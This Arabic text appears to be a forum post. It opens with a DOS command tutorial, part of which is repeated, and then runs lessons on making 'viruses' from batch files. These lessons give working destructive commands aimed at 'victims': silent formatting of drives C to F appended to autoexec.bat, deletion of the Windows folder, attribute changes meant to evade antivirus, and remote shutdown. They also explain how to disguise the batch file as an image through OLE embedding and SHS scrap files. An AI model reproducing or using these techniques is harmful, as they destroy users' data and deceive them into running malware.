* طريقة التنقل بين محركات الأقراص: بالضغط على الرمز ثم نلحقه بـ :
* الملفات الأساسية لنظام التشغيل الـ ( DOS ):
يتكون نظام التشغيل من ثلاثة ملفات أساسية تمثل البنية الأساسية للنظام والعمود الفقري له وهي كالتالي:
أولاً: IO.SYS : وهذا الملف خاص بالتحكم في الإدخال والإخراج.
ثانياً: MSDOS.SYS : وهذا الملف يحتوي على مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند التشغيل.
ثالثاً: COMMAND.COM : وهذا الملف يحتوي على جميع أوامر نظام التشغيل الداخلية .
* مكونات نظام التشغيل:
ينقسم نظام التشغيل إلي ثلاثة أجزاء رئيسية :
الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة عن مجموعة من التعليمات والأوامر تعمل بصورة تلقائية لا دخل للمستخدم فيها ولا يمكنه التحكم بها وهي مخزنة في ذاكرة القراءة فقط ( ROM ) والتي لايمكن مسحها أو تعديلها والجزء الثالث عبارة عن مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم وتيسر له استخدام الكمبيوتر .
* الاختصارات :
يستخدم نظام التشغيل ( DOS ) اختصارين اثنين عوضاً عن أسماء الملفات أو جزء منها داخل صيغة الأوامر وهما:
1) الرمز ( ? ) : ويستخدم للدلالة على غياب حرف واحد فقط من اسم أحد الملفات.
2) الرمز ( * ) : ويستخدم للدلالة على غياب أي عدد من الحروف (بشرط أن لا يتجاوز 8 أحرف).
* الأوامر:
تنقسم أوامر الـ DOS إلى قسمين:
1- الأوامر الداخلية : وهي الأوامر التي يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر لا يستلزم وجود أسطوانة لتنفيذه.
من أمثلة الأوامر الداخلية:
CLS - TIME - DATE - MD - CD - RD - DIR - DEL
2-الأوامر الخارجية : وهي الأوامر التي لا يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها يشترط وجود اسطوانة نظام التشغيل داخل المشغل المرن أو الصلب.
من أمثلة الأوامر الخارجية:
FORMAT - DISKCOPY - DISKCOMP - COMP - SYS - EDIT
- تنقسم أوامر نظام التشغيل الداخلية والخارجية إلي ستة أنواع :
1-أوامر النظام:
MEM
DATE
VER
DosKey
PROMPT
CLS
VSAFE
MEMMAKER
MODE
COMMAND
MSD
TIME
DEFRAG
2-أوامر الاسطوانة:
SCANDISK
CHKDSK
FORMAT
DISKCOMP
DISKCOPY
MSBACKUP
SYS
LABEL
FDISK
UNFORMAT
VOL
3-أوامر الفهرس:
APPEND
DIR
CD
RD
MOVE
DATE
DELTREE
MD
TREE
4-أوامر الملفات:
TYPE
COPY CON
COPY
ATTRIB
DEL
REN
UNDELETE
XCOPY
FIND
EDIT
SORT
MSAV
MORE
HELP
5-الأوامر الحزمية:
REM
CALL
ECHO
FOR
IF
PAUES
SHIFT CHOICE
GOTO
6-أوامر خاصة ونادرة الاستخدام:
FASTOPEN
MSCDEX
CHCP
INTERLNK
QBASIC
DRVSPACE.SYS
LOADFIX
SHARE
FASTHELP
NLSFUNC
CTTY
INSTALL.HIGH
RECOVER
DEBUG
KEYB
* شرح لأهم الأوامر المستخدمة في نظام الـ DOS :
1-الأمر: VER ( وهو اختصار كلمة VERSION وتعني إصدار ) وهو من الأوامر الداخلية ووظيفته الاستعلام عن رقم إصدار نظام التشغيل الـ MS-DOS .
ومثال على ذلك قم بكتابة الأمر VER في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر MS-DOS VER 6.22 .
-ملاحظة: هذه الإجابة تختلف من جهاز إلي آخر حسب نسخة نظام التشغيل .
2-الأمر: DATE ( التاريخ ) وهو من الأوامر الداخلية ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر DATE في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر current Date is THU 03-25-99 وكذلك Enter New Date mm-dd-yy للتعديل ولإدخال التاريخ الجديد تسجل أولاً الشهر ثم اليوم ثم السنة وإذا لم نرغب في كتابة تاريخ جديد يكفي الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ.
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب التاريخ .
-شروط كتابة التاريخ في نظام التشغيل DOS:
1-نظام التشغيل لا يقبل إي تاريخ قبل سنة 1980.
2-لا يمكن استخدام التاريخ الهجري.
3-لا يمكن كتابة الأشهر بالحروف.
4-لا يمكن استخدام النقطتين الرأسيتين : كفاصل بين في التاريخ
5-أن تستخدم في كتابة التاريخ النظام الأمريكي (mm-dd-yy) الشهر ثم اليوم ثم السنة .
3-الأمر: TIME ( الوقت ) وهو من الأموامر الداخلية ووظيفته عرض الوقت المسجل داخل جهاز الحاسب مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر TIME في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر current Time is : 4:40:55.75a وكذلك Enter New Time للتعديل وذلك بأن تسجل أولاً الساعات ثم الدقائق ثم الثواني ثم كسر الثواني ثم تحديد الوقت صباحاً أو مساءاً وإن لم ترغب في كتابة وقت جديد يكفيك الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ .
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب الوقت .
4-الأمر: CLS ( وهو اختصار لجملة Clear The Screen وتعني مسح الشاشة ) وهو من الأوامر الداخلية ووظيفته هي تنظيف الشاشة من كافة البيانات التي عليها وإرجاع محث التشغيل إلي أول سطر على الشاشة مهما كان موقعه أثناء تنفيذ الأمر.
ومثال على ذلك قم بكتابة الأمر CLS في الـ DOS :
ثم بالضغط على مفتاح ENTER سيتم تنظيف الشاشة من البيانات الموجودة عليها وليس مسح البيانات.
5-الأمر : PROMPT وهو من الأوامر الداخلية ووظيفته تغيير شكل محث التشغيل لنظام التشغيل.
ومن أهم استخدامات الأمر PROMPT التالي:
PROMPT $D تغيير شكل المحث C إلي علامة تاريخ اليوم
PROMPT $T تغيير شكل المحث C إلي علامة الوقت الحالي
PROMPT $Q تغيير شكل المحث C إلي علامة =
PROMPT $$ تغيير شكل المحث C إلي علامة $
PROMPT $V تغيير شكل المحث C إلي رقم إصدار نظام التشغيل
6-الأمر: VOL ( وهو اختصار لكلمة Volume Label ) وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة الداخلي
ومثال غلى ذلك قم بكتابة الأمر VOL في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر Volume in drive C is alwafa
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب اسم القرص .
7-الأمر : DIR وهو من الأوامر الداخلية ووظيفته عرض الملفات الموجودة على الفهرس الحالي ومن خلاله نستطيع عرض :
1-اسم الاسطوانة والرقم المسلسل لها.
2-اسم الفهرس الحالي والمسار الحالي له.
3-عرض الملفات الموجودة بخمس بيانات(اسم الملف -نوع الملف (امتداده) -مساحة الملف بالبايت (حجم الملف)-تاريخ إنشاء الملف -وقت إنشاء الملف) .
4-عرض الفهارس الموجودة بأربعة بيانات وهي (-اسم الفهرس-علامة الفهرس وتكون على الشكل < DIR > بجوار اسم الفهرس-تاريخ إنشاء الفهرس -وقت إنشاء الفهرس ).
5-رسالة تعرض إجمالي عدد الملفات الموجودة بالفهرس الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه الملفات.
6-المساحة الحرة أو الشاغرة على الاسطوانة أو القرص .
أهم صور استخدامات الأمر DIR:
DIR/P لعرض الملفات صفحة صفحة
DIR/W لعرض الملفات بعرض الشاشة
DIR/B لعرض أسماء الفهارس والملفات ونوعها فقط
DIR/L لعرض أسماء الفهارس والملفات بالحروف الصغيرة
DIR/S لعرض كل الملفات والفهارس الموجودة بالفهرس الحالي
DIR/O لعرض الفهارس والملفات مرتبة ترتيب أبجدي من A إلي Z
DIR/OS لعرض الفهارس والملفات مرتبة حسب مساحتها بالبايت من الأصغر إلي الأكبر
DIR/AH عرض الملفات المخفية فقط
DIR/AR عرض ملفات القراءة فقط وهي محمية من الإلغاء
DIR/AS عرض ملفات النظام فقط
DIR/AD عرض جميع الفهارس فقط بدون الملفات
DIR/AA عرض الملفات التي تحمل علامة الأرشيف فقط
8-الأمر: MD ( وهو اختصار لكلمة Make Directory ) وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس فرعي آخر.
9-الأمر : CD (وهو اختصار لكلمةChange Directory ) وهو من الأوامر الداخلية ووظيفته:
1-معرفة الفهرس الحالي
2-الانتقال بين الفهارس إما من:
-رئيسي إلي فرعي
-فرعي إلي رئيسي
وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب الأمر CD فقط ثم نقوم بالضغط على مفتاح ENTER
10-الأمر RD ( وهو اختصار لكلمة Remove Directory ) وهو من الأوامر الداخلية ووظيفته حذف أو إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس فرعي فهناك شرطين:
1- إزالة جميع الملفات والبرامج الموجودة داخل الفهرس الفرعي المراد إزالته.
2- ألا يكون الفهرس الفرعي المراد إزالته هو الذي نقف عليه الآن بل يجب أن نكون على فهرس آخر أعلى منه رتبة.
11-الأمر : COPY وهو من الأوامر الداخلية ووظيفته نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس آخر أو في أسطوانة أخرى.
12-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
ومن عيوب الأمر COPY CON إنه:
1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
-ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة.
-ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Re**** ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى
-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
ومن عيوب الأمر COPY CON إنه:
1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
-ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة.
-ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Re**** ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى.
ملاحظة: في حال مسح كل الملفات لا بد من ظهور الرسالة التأكيديه التالية:
All Files in directory will be deleted
Are you Sure Y/N
وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط N.
16-الأمر: PATH وهو من الأوامر الداخلية ووظيفته فتح مسار أو عدة مسارات على مجموعة محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى يسهل التعامل مع الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف Autoexec.bat في سطر واحد (لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر صورة له في آخر سطر ) ويوصف بداخله كل الفهارس التي نرغب بالتعامل معها مباشرة بدون إستخدام الأمر CD للدخول إليها.
-ملاحظات هامة:
1-يوضع أمر PATH داخل ملف Autoexec.bat في سطر واحد .
2-من الممكن كتابة أمر PATH على إي مشغل أقراص في كل مرة تفتح فيها حاسبك.
مثال على ذلك قم بكتابة الأمر PATH على الـ DOS لكي تعرف اسم المسار الموجود بالجهاز.
17-الأمر: MEM وهو من الأوامر الخارجية ووظيفته إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة.
18-الأمر: MODE وهو من الأوامر الخارجية ووظيفته:
1-التحكم في حجم الكتابة وعرضها على الشاشة.
2-إعطاء تفاصيل عن الملحقات المتصلة بالحاسب وما إذا كانت متصلة معه على التوالي أو على التوازي.
19-الأمر: DOSKEY وهو من الأوامر الخارجية ووظيفته:
1-استدعاء وتعديل اسطر الأوامر وذلك باستدعاء كل ما سبق تنفيذه من أوامر .
2-إنشاء ما يسمى بالماكرو ( Macros ) وهو عبارة عن مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها مفتاح معين لتشغليها بخطوة واحدة.
-ملاحظة هامة: الأمر DOSKEY يقوم بحجز 4 كليو بايت من الذاكرة الأساسية.
20-الأمر: MSD وهو من الأوامر الخارجية ووظيفته:
1-اكتشاف مواصفات الحاسب من حيث:
( نوع المعالج - حجم الذاكرة - أنواع مشغلات الأقراص - مواصفات نظام العرض - وباقي المكونات).
2-الحصول على تقارير فنية تفيد باكتشاف المشاكل التي حدثت على الحاسب مثل تلف شرائح الذاكرة الـ RAM .
21-الأمر: Command وهو من الأوامر الخارجية ووظيفته تفسير أوامر نظام التشغيل الداخلي.
22-الأمر: DEFRAG وهو من الأوامر الخارجية ووظيفته تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي جوار بعضها وبالتالي توفير مساحة إضافية.
23-الأمر: FORMAT وهو من الأوامر الخارجية ووظيفته تهيئة الأسطوانة الصلبة أو المرنة.
24-الأمر: LABEL وهو من الأوامر الخارجية ووظيفته إعادة تسمية الاسطوانة أو تعديل إسمها أو مسحه.
25-الأمر: DISKCOPY وهو من الأوامر الخارجية ووظيفته نسخ أسطوانة مرنة على أخرى مطابقة لها تماما من حيث النوع والحجم والسعة ويقوم بنسخ كامل الملفات حتى المخفية.
ملاحظة : (الأمر COPY والأمر XCOPY لا يستطيعان نقل الملفات المخفية).
26-الأمر: CHKDSK وهو من الأوامر الخارجية ووظيفته فحص الأسطوانة وإعطاء تقرير عن حالتها.
27-الأمر: UNFORMAT وهو من الأوامر الخارجية ووظيفته إستعادة محتويات أسطوانة ما كانت قد مسحت جميع محتوياتها من خلال الأمر FORMAT.
-ملاحظة هامة:
يستطيع الأمر UNFORMAT إعادة محتويات الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط عدم إستخدامها مسبقاً مع الأمر FORMAT عند التهيئة وإلا فأنه يستحيل إعادة محتويات الأسطوانة كما كانت .
28-الأمر: SYS وهو من الأوامر الخارجية ووظيفته:
1-نسخ ملفات نظام التشغيل MS-DOS إلي أسطوانة ما.
2-نسخ ملف COMMAND.COM إلي أسطوانة ما.
29-الأمر: DISKCOMP وهو من الأوامر الخارجية ووظيفته المقارنة بين اسطوانتين متطابقتين .
ملاحظة: هذا الأمر لا ينفع التعامل به مع أقراص صلبة على الإطلاق.
30-الأمر: SCANDISK وهو من الأوامر الخارجية ويستخدم لاكتشاف إي أجزاء تالفة على القرص .
31-الأمر: FDISK وهو من الأوامر الخارجية ووظيفته تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل DOS.
32-الأمر: TREE وهو من الأوامر الخارجية ووظيفته عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك عرض مساراتها.
33-الأمر: MOVE وهو من الأوامر الخارجية ووظيفته نقل ملف أو أكثر أو فهرس فرعي من مكان لآخر.
34-الأمر: DELTREE وهو من الأوامر الخارجية ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان بداخله ملفات.
35-الأمر: UNDELETE وهو من الأوامر الخارجية ووظيفته استعادة الملفات الممحاة بواسطة الأمر DEL.
ملاحظات هامة:
1-عندما يتم حذف ملف بالأمر DEL فإن نظام التشغيل DOS يقوم بتغيير الحرف الأول من هذا الملف وتحويله إلي علامة ؟.
2-يمكن استرجاع ملف قبل تخزين إي ملف آخر جديد على الملف السابق.
36-الأمر: ATTRIB وهو من الأوامر الخارجية ووظيفته يعرض ويتحكم في صفحات الملف وذلك بتغيير خصائصه كجعله مثلاً ملف خفي أو ملف نظام أو قابل للقراءة فقط أو غير ذلك.
37-الأمر: PRINT وهو من الأوامر الخارجية ووظيفته طباعة الملفات النصية فقط.
38-الأمر: XCOPY وهو من الأوامر الخارجية ووظيفته نسخ مجموعة من الملفات أو الفهارس .
39-الأمر: EDIT وهو من الأوامر الخارجية وهو عبارة عن محرر نصوص تابع لنظام التشغيل DOS والذي من خلاله تتمكن من كتابة وتعديل الملفات.
-ملاحظات هامة:
يعالج هذا الأمر جميع عيوب الأمر COPY CON حيث أنه باستخدامه يمكن عمل الآتي:
1-فتح ملف سبق حفظه والتعديل فيه.
2-التحرك داخل الملف يميناً ويساراً ولأعلى ولأسفل .
3-يتم حفظ الملف باستخدام Alt+F ثم نختار أمر Save ثم كتابة أسم الملف.
-يتم الخروج من الأمر باستخدام Alt+F ثم نختار أمر Exit.
-لكي يعمل الأمر EDIT لابد من وجود ملف QBASIC*****.
بسم الله الرحمن الرحيم
الفيروسات
الدرس الثاني
طريقة صناعة الفيروسات عن طريق الملفات الدفاعية
الدرس الثاني
1-تعريف الملفات الدفاعية :
هي عبارة عن حزمة من اوامر نظام التشغيل DOS يمكننه من خلاله استخدام اكثر من امر دوسي في وقت واحد مما يسهل للمستخدم الاستخدام مثل استخدام اكثر من امر format,copy,cd ..... |393|
2-.طرق صناعة الملفات الدفاعية :
الطريقة الاولى :
-----------------
1.افتح -----> start واضغط على Run واكتب command واضغط على ENTAR
2.اكتب امر(copy con) ثم اسم الفيروس |564| و الامتداد bat ثم اضغط Enter
3.اكتب الكود
4.لحفظ طريقتان هما
1.اضغط على F6 ومن ثم Enter
2.اضغط على Ctrl + z و من ثم Enter
الطريقة الثانية :
-----------------
1.ابدأ -----> البرامج -----> البرامج الملحقة -----> المفكرة Notepad
2.اكتب الكود
3.احفظ الفيروس بامتداد bat و حدد الموقع
الطريقة الثالثة :
-----------------
1.ابدأ -----> البرامج -----> DOS
2.اكتب Edit
3.ادخل الكود |312|
4.قم بحفظ الملف بمتداد bat و حدد المسار الخاص به
3-ايعازات التشغيل :
الايعاز الوظيفة
Echo تمنع عمل الإيعاز ( تعرض سطر على الشاشة )
Nul نقل بدون السؤال نعم-لا
Call الدخول الى ملف
@ يمنع عرض السطر على الشاشة
Cls يمسح الشاشة
Puse يقول للضحية الضغط على اي زر
Start بعد هذا الامر ضع اسم اي برنامج ليتم تغيله عند تشغيل الفيروس
End يوضع في نهاية الفيروس و هو ينهي الفيروس بعد تنفيذ الاوامر
/n ايعاز لا
cd\ الدخول الى ملف
\cd الخروج من ملف
/y ايعاز نعم |364|
***ارجوا ان تكون واضحة و هي سهلة الاستخدام
4-طريقة تشفير الفيروس :
اخواني هذه الطريقة ليست لتشفير الفيروس فقط بل لدمج الفيروس و تغير امتداد الفيروس اما سبب تغير الامتداد من bat الى exe فسوف اذكر السبب في الدرس الرابع في قسم اسئلة و حلول ...
يمكنك تغير امتداد الـ Batch عن طريق برنامج Microsoft Visual Basic في الاصداران الخامس و السادس :
1.افتح برنامج الفيجول بيسك
2.اختر الاداة OLD من قائمة الادوات سوف تظهر لك نافذة Insert Object اختر منها Create from File ثم
اضغط على Browse واختر الصورة التي تريدها أو مقطع فلم أو اي شيء تريده ثم اضغط على OK
3.اختر اداة OLE مره اخرى وارسم مربع ثاني واختار Create from File ثم Browse واختر الباتش
الذي تريده ثم اضغط OK
4.ادخل كود الفروم :
----------------------------------
Microsoft Visual Basic 5.0 :
LE1.DoVerb OLE2.DoVerb
----------------------------------
Microsoft Visual Basic 6.0 :
OLE1.DoVerb
OLE2.DoVerb
me.hide ' تـقوم باخفاء الفورم
----------------------------------
5.من قائمة File اختر Make Project1***** سوف تأتيك نافذة باسم Make Project اكتب اسم الملف الذي تريد تسميته مثلا اكتب Virus |105| لقد انتهينا من دمج الباتش مع الصوره ولكن امتداده EXE
6.الان سوف نقوم بتغيير امتداد EXE الى امتداد غير معروف|104| من قبل الكثير من مستخدمي الانترنت والامتداد
هو SHS وهذا الامتداد جدا خطير لما فيه من امكانيات الاتصال مع البرامج الاخرى وهو Scrap Object
والطريقه هي كالتالي :
1.قم بتشغيل برنامج WordPad افتح البرنامج وصغر النافذه وافتح مجلد الذي حفظت فيه ملف
الباتش+الصورة حاول تنسق النوافذ والان اضغط على البرنامج Virus بالزرار الايسر مره واحده ولا ترفع اصبعك عن الزرار ثم اسحبه الى برنامج WordPad سوف ينتقل الملف الى البرنامج بكل سهوله ثانيا اضغط بالزر الايمن على
2.الملف الذي انتقل الى WordPad اختر Package Object ثم Edit Package سوف تظهر لك نافذه بأسم Object Packager - Package in ******** اختر قائمة Edit ثم Copy Package ثالثا واخيرا اختر المجلد الذي به ملف EditServer ثم اضغط في المكان الفارغ على الزرار الايمن ثم اختر Paste (لصق) سوف يتكون لك ملف شكله غريب باسم Scrap وهذا |535| هوالملف قد تغير امتداده الى shs واذا ضغط عليه دبل كلك سوف تظهر لك صوره وسوف يشتغل ايضا ملف الباتش الذي دمجته مع الصوره والآن قد حصلت على باتش مرفق بصوره .
الامر Call يتصل في ملف معين اما الامر start يبدأ بتنفيذ امر او تشغيل برنامج
مثال (1) :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
اخوي في هذا المثال استخدمنا الامر Call للاتصال في الملف autoexec و قمنا بتغير خصائصه
مثال (2) :
كود PHP:
start MSPaint
في هذا المثال امرنا بتشغيل برنامج الرسام اول ما يبدا الفيروس عمله
واريد المستخدم مثلا يضغط حرف y ويضغط enter وينفذ امر معين وn وenter يتنفذ امر اخر
اخي سوف اعطيك مثال عندما تقوم بالفورمات سوف يسألك الحاسب هل انت متأكد اجب بـ Y,N هنا نكتب هذا الايعاز لتجاهل الرسالة و الا اذ لم نكتب الايعاز سوف يظهر مثلا رسالة تقول للضحية سوف تقوم بحذف مجلد الوندوز هل انت متأكد من ذلك ... و اكيد سوف يجب بـ لا و هكذا لا يعمل الفيروس
الدرس الثالث
اليوم يا شباب راح انكمل دروس احتراف صناعة الفيروسات عن طريق المفات الدفاعية Batch Files المهم نحن بهذاك الدرس اتعلمنا بعض الايعزات و طريق تشفير و غير ذالك ... المهم هذا الدرس راح انطي امثلة عن العمل مع الملفات اخواني انا في هذه الدروس اعلمكم على كيفية التعامل مع الملفات الدفاعية لانه بعد التعلم سوف تقدر ان تصنع فيروسات بدون مساعدة من اي شخص و تصنعون فيروسات ة غير مكشوفة ان شاء الله
1-اوامر و امثلة :
del - Delete File
del c:\windows\*.txt
الشرح : لمسح ملف ما في هذا المثال قمنا بمسح كل ما يوجد في مجلد الوندوز
deltree - Delete Folder
deltree \y c:\windows
الشرح : لمسح ملف اي ليس له امتداد ملف هنا مسحنا ملف وندوز وليس ما بداخل الوندوز ملحوظة هامة هذا الامر لايعمل علي الاكس بي يعمل علي 98 اوك .
call - Open Or Call Another .bat File
call c:\windos\anything.bat
الشرح : هنا قمنا بأتصال مع ملف اخر لتحرير و مسح و نقل ...
cls - Clear The Screen
الشرح : هذا الامر من اجل تنظيف الشاشة من الاحرف
echo - Allows You To Write Anything
echo hahaha i will kill yr computer
الشرح : هذا الامر من احدى اجمل الايعازات و هو يجعل الضحية |596| يقرأ المكتوب مثلاً كتبة انا دمرتك يمكنه قرائته اي انه فقط لكتابة السطور
goto - To Go To a Nother Section In a Batch File
:start
echo i hack you
goto next
:next
del c:\windows\******
الشرح : في هذا الامثال استخدمنا الامر go to يعمل على |554| الذهاب الى امر اخر لتنفيذه
copy %0 - To Copy The Running File To Another Place
copy %0 c:My********\anything.bat
الشرح : اما عن هذا الامر فهو مخصص لنسخ ملف copy
2.طريقة تغير امتداد Batch عن طريق Dos :
اذهب الى start اكتب command تفتح لك شاشة سوداء مكتوب فيها
cd:\windows
انت في هذه الحالة تكتب
..cd
كرر هذا الامر الى ان تجعلها
بعد ما تنتهي من هذا الامر تذهب الى my cumputer ثم تختار (:c)
وضع الفيروس |4| فية ثم اذهب الى الدوس و اكتب هذا الامر
cd:\>copy virus***** virus.com
virus هو اسم الفيروس تبعك
وممكن تغير الامتداد الى com,scr,bat
ملاحظة :*** اخواني انا متأكد من الطريقة و مجربة و ناجحة 100% اكو شيء ثاني ليس تغير الامتداد بل منع مضادات الفيروسات من حذف الفيروس الطريقة سهلة جدا و ذكية في نفس الوقت كتالي :
انت مو كونت فيروس كويس اعمل التالي ادخل الى الدوس و ادخل الى ملف الفيروس فرضاً اسم الفيروسmoodax.bat اذن اكتب التالي :
ren moodax.bat ~moodax*
للاحتراف بجد
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...
1- الاكود الاكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس
كود PHP:
call attrib -h -r c:autoexec.bat >nul
------------------------------------
2.هذا الكود للفورمات
كود PHP:
echo format a: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
3.هذا كود للفورمات لكن بالختصار
echo & /autotest >nul >>c:\autoexec.bat ألاولى تعنى انسخ الامر القادم الى
(طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الاوتواكسيك فى السى
------------------------------------
4.هذا كود فورمات كل الاقراص |385|
كود PHP:
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
5.هذا كود فيروس العد التنازلي و علاجه :
الكود:
echo off@
shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
echo off@
shutdown -s -t 15 -c "message" -m \\****computer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير ****computer الى الجهاز المراد اغلاقه
العلاج :
shutdown –a
2-مجموعة من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
1 - اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً اكس
ملاحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى >nul >>c:autoexec.bat
والسطر الاخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
مع تكرار السطر الاخير ان تتطلب ويمكنك وضع قاعدة مشتركة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
echo كود دوسى >nul >>c:autoexec.bat
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادى الرسالة التحذيرية
------------------------------------
2 - اذ اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا اذن اتبع القاعدة الاولى يكون الكود كما يال
كود PHP:
ي
call attrib -h -r c:autoexec.bat >nul
